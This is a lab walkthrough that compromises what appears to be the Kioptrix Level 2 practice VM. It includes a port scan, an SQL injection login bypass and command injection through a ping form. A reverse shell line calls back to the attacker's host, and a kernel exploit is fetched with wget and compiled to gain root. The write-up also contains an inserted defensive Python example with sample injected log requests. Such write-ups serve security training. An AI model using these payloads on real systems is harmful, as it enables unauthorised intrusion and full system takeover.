Information gathering

As before, netdiscover is used to gather information and locate the target's IP address.

The target's IP address is 192.168.43.47

Scan the target's ports with nmap:

root@kali:~# nmap -sS -A -T4 192.168.43.47
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-07 05:01 EDT
Nmap scan report for 192.168.43.47
Host is up (0.00047s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 841/udp status
|_ 100024 1 844/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2018-05-07T05:51:42+00:00; -3h09m44s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
|_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:53:19:4C (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: -3h09m44s, deviation: 0s, median: -3h09m44s

TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 192.168.43.47

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.46 seconds

Exploitation

Port 80/tcp is open, serving Apache httpd 2.0.52 ((CentOS)).

Trying the "universal password" ' or 1=1# on the login form succeeds in logging in.

Once logged in, there is an input box that runs a ping command.

So this is a command execution vulnerability.

In command execution, the common shell operators | && || ; can be used to chain commands. Their behaviour:

root@kali:~# whoai||id			// if the command on the left of || (command 1) does not succeed, the command on the right (command 2) runs
bash: whoai: 未找到命令
uid=0(root) gid=0(root) 组=0(root)
root@kali:~# whoami|id // the later command runs (whoami's output is piped into id, which ignores it)
uid=0(root) gid=0(root) 组=0(root)
root@kali:~# whoami;id // run in sequence
root
uid=0(root) gid=0(root) 组=0(root)
root@kali:~# whoami&&id // the command on the right of && (command 2) runs only after the left one (command 1) returns true (exit status 0, i.e. it succeeded)
root
uid=0(root) gid=0(root) 组=0(root)

Here | and ; can be used to chain our own command onto the ping in the input box.
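As an added defensive example (not part of the writeup): a ping-box handler that allow-lists the host parameter and calls ping without a shell, so the operators listed above never reach one, plus a check that flags access-log entries carrying those operators. The script path /ping.php, the parameter name ip and the log lines are constructed for the example, not taken from the target.

```python
import ipaddress
import re
import subprocess
from urllib.parse import unquote_plus

# Characters the shell treats as separators or substitution: ; | || && ` $ redirects.
SHELL_OPERATORS = re.compile(r"[;|&`$<>\n]")
HOSTNAME = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
                      r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*")

def is_safe_host(value: str) -> bool:
    """Allow-list check: accept only an IP address or a plain DNS hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME.fullmatch(value) is not None

def build_ping_argv(host: str) -> list:
    """argv for ping with no shell involved; the allow-list also rejects a
    leading '-' so the value cannot be parsed as a ping option."""
    if not is_safe_host(host):
        raise ValueError("rejected host parameter")
    return ["ping", "-c", "1", host]

def run_ping(host: str) -> str:
    """Safe counterpart of system('ping ' + user_input): no shell=True."""
    return subprocess.run(build_ping_argv(host), capture_output=True,
                          text=True, timeout=10).stdout

def flag_injection_attempts(log_lines):
    """Return (line_no, decoded query) for requests whose URL-decoded query
    string contains a shell operator."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r'"(?:GET|POST) \S*?\?(\S*)', line)
        if m:
            query = unquote_plus(m.group(1))
            if SHELL_OPERATORS.search(query):
                hits.append((n, query))
    return hits

# Constructed Apache access-log lines (script name, parameter and requests are made up).
SAMPLE_LOG = [
    '192.168.43.177 - - [07/May/2018:05:10:01 -0400] "GET /ping.php?ip=192.168.43.177 HTTP/1.1" 200 512',
    '192.168.43.177 - - [07/May/2018:05:10:09 -0400] "GET /ping.php?ip=127.0.0.1%3Bcat+%2Fetc%2Fpasswd HTTP/1.1" 200 2048',
    '192.168.43.177 - - [07/May/2018:05:10:15 -0400] "GET /ping.php?ip=127.0.0.1%7Cid HTTP/1.1" 200 310',
]
```

The log check only sees GET query strings; a form submitted by POST needs the request body logged (or a WAF rule) to apply the same test.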

Test it with cat /etc/passwd.

Next, use the command execution to get an interactive shell.

;bash -i >& /dev/tcp/192.168.43.177/2333 0>&1

At the same time, listen on port 2333 with nc.

This gives an interactive shell, but it runs as the apache user.

Privilege escalation

The current user is apache; we need to escalate privileges to get root.

bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

Check the current system version, then run searchsploit linux 2.6.9 to look for a matching privilege escalation exploit.

https://www.exploit-db.com/download/9542.c

The exploit 9542.c is used.

bash-3.00$ cd /tmp
bash-3.00$ wget http://192.168.43.177/9542.c
--03:06:55-- http://192.168.43.177/9542.c
=> `9542.c'
Connecting to 192.168.43.177:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [text/x-csrc]

0K .. 100% 252.25 MB/s

03:06:55 (252.25 MB/s) - `9542.c' saved [2645/2645]

bash-3.00$ gcc -o 9542 9542.c
bash-3.00$ ./9542
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# whoami
root

Privilege escalation succeeded.